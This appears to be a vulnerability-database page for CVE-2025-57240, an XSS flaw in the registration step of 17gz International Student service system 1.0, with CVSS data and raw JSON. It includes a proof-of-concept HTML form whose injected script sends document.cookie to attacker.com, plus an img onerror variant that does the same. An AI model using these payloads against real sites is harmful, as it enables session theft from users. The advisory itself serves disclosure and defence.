Security Vulnerability Report
CVE-2025-57240 CVSS 6.1 MEDIUM

CVE-2025-57240

Published: 2025-10-23 18:16:06
Last Modified: 2026-04-15 00:35:42

Description

Cross site scripting (XSS) vulnerability in 17gz International Student service system 1.0 allows attackers to execute arbitrary code via the registration step.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

17gz International Student service system 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CVE-2025-57240 PoC - XSS in 17gz International Student Service System -->
<!-- Target: Registration page in 17gz International Student service system 1.0 -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-57240 PoC</title>
</head>
<body>
  <h2>CVE-2025-57240 XSS PoC</h2>
  <p>Target: 17gz International Student service system 1.0</p>
  <form id="exploitForm" action="http://target-site/register" method="POST">
    <!-- Malicious payload injected in username field -->
    <input type="text" name="username" value='"><script>fetch("https://attacker.com/log?cookie="+document.cookie)</script><x y="'>
    <input type="text" name="email" value="[email protected]">
    <input type="password" name="password" value="Password123">
    <input type="password" name="confirm_password" value="Password123">
    <button type="submit">Register</button>
  </form>
  <script>
    // Alternative payload using event handler
    const payload = '<img src=x onerror="fetch(\'https://attacker.com/log?cookie=\'+document.cookie)">';
    // Auto-submit form for demonstration
    // document.getElementById('exploitForm').submit();
    console.log('PoC payload:', payload);
    console.log('Target URL: http://target-site/register');
  </script>
</body>
</html>

References

https://github.com/samllpotato1/xss/blob/main/xss.txt
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-57240",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-23T18:16:06.240",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Cross site scripting (XSS) vulnerability in 17gz International Student service system 1.0 allows attackers to execute arbitrary code via the registration step."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/samllpotato1/xss/blob/main/xss.txt",
        "source": "[email protected]"
      }
    ]
  }
}